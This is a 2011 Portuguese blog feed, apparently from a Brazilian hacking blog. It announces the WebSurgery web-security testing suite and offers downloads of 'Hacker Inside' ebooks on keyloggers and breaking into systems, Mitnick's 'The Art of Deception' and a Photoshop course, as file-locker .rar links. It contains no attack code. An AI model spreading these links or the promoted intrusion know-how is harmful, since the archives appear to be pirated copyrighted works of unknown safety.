WebSurgery v.0.6 Released

noreply@blogger.com (MaUzZz[BR]) — Tue, 30 Aug 2011 17:46:00 -0700

WebSurgery é uma suíte de ferramentas para testes de segurança de aplicações web. Ele foi projetado para os auditores de segurança para ajudá-los com o planejamento de aplicação web e exploração. Atualmente, ele usa um rastreador da Web eficiente, rápido e estável, File / Forcer Brute Dir, Fuzzer para exploração avançada de vulnerabilidades conhecidas e incomuns, como SQL Injeções, cross-site scripting (XSS), Força bruta de formulários de login, identificação de firewall-regras filtrado, ataques DoS e Proxy WEB para analisar, interceptar e manipular o tráfego entre o browser ea aplicação web alvo.

eBooks: Coleção Hacker Inside – Volume 1 ao 5

noreply@blogger.com (MaUzZz[BR]) — Sun, 14 Aug 2011 21:21:00 -0700

A Coleção Hacker Inside – Top Secret está ai para confirmar o que todo mundo já sabe: você ainda precisa aprender muito para se tornar um hacker de verdade.

Não se engane com qualquer coisa que aparece por aí. Só Hacker Inside explica tudo sobre o submundo hacker e cracker:

- Espionagem – Keylogger;
- Fundamentos de Esteganografia;
- Criptografia;
- Criptoanálise;
- Firewall;
- Antivírus;
- Senhas e muito mais

E, para quem tem espírito hacker, os desafios não param por aí. Saiba os principais passos para acessar um sistema de segurança e descobrir suas falhas.

[sourcecode language="css"]
Volume 1 = http://neo-share.com/files/HXELGKLM/Hacker_Inside_-_Vol._1.rar
Volume 2 = http://neo-share.com/files/1VMQ0ADW/Hacker_Inside_-_Vol._2.rar
Volume 3 = http://neo-share.com/files/POOLY2NT/Hacker_InsideVol3.rar
Volume 4 = http://neo-share.com/files/WXVIHIUI/Hacker_InsideVol._4.rar
Volume 5 = http://neo-share.com/files/QVOLPHNR/hacker_Inside_-_Vol._5.rar
[/sourcecode]

eBook: A Arte de Enganar

noreply@blogger.com (MaUzZz[BR]) — Sun, 14 Aug 2011 21:08:00 -0700

Todos os firewalls e protocolos de criptografia do mundo nunca serão suficientes para deter um hacker decidido a atacar um banco de dados corporativo ou um empregado revoltado determinado a paralisar um sistema.

Neste livro, um dos ’hackers’ mais famosos do mundo, Kevin D. Mitnick, fornece cenários realistas de conspirações, falcatruas e ataques de engenharia social aos negócios – e suas conseqüências.

Convidando você a entrar na mente complexa de um hacker, este livro mostra como até mesmo os sistemas de informações mais bem protegidos são suscetíveis a um determinado ataque realizado por um artista da trapaça passando-se por um fiscal do IR ou outro personagem aparentemente inocente.

Este livro explora, de forma envolvente e agradável, o motivo pelo qual cada ataque aos sistemas foi tão bem-sucedido e como ele poderia ter sido evitado.

* Tamanho: 45 MB
* Idioma: Português
* Formato: PDF

Curso de Efeitos Digitais

noreply@blogger.com (MaUzZz[BR]) — Sun, 14 Aug 2011 21:02:00 -0700

PhotoShop

* Pintura a óleo
* Criando um Background
* Criando um background #1
* Simulando etiquetas de roupa
* Construção de um relógio antigo
* Tipografia
* Efeito bronze
* Efeito Revista
* Efeito Cartoon
* Tipografia Mármore
* Efeito Marca dágua
* Envelhecimento de fotos
* Efeito foto rasgada
* Efeito publicitário
* Efeito pixelate em imagens
* Utilização de efeitos do Photoshop em vídeos
* Topo estilizado
* Tipografia Cartoon
* Gotas de água
* Criando um disco de vinil
* Estilizando logotipo
* Tipografia Costura de letras
* Criação Homem de Ferro (personagem)
* Criando Cartaz publicitario
* Criando papel amassado
* Efeito publicitario brushs

* Illustrator

* Efeito publicitario com brushs e vetores
* Criando background com ferramenta Merg
* Criação de elemento 3d – Litro de leite
* Criação de elemento 3d – Canetas
* Criação de silhuetas
* Varinha mágica
* Mala em vetor
* Lápis em vetor
* Vetorizando imagem
* Colorização simples.

* Tamanho: 700 MB
* Idioma: Português
* Sistema operacional: Todos

[sourcecode language="php"]

Parte 1= http://hotfile.com/dl/126223394/90da13e/A9392-CED.part1.rar.html
Parte 2= http://hotfile.com/dl/126224484/3e1502d/A9392-CED.part2.rar.html
Parte 3= http://hotfile.com/dl/126225565/b4afccd/A9392-CED.part3.rar.html
Parte 4= http://hotfile.com/dl/126226860/603f106/A9392-CED.part4.rar.html
Parte 5= http://hotfile.com/dl/126227900/b362deb/A9392-CED.part5.rar.html

[/sourcecode]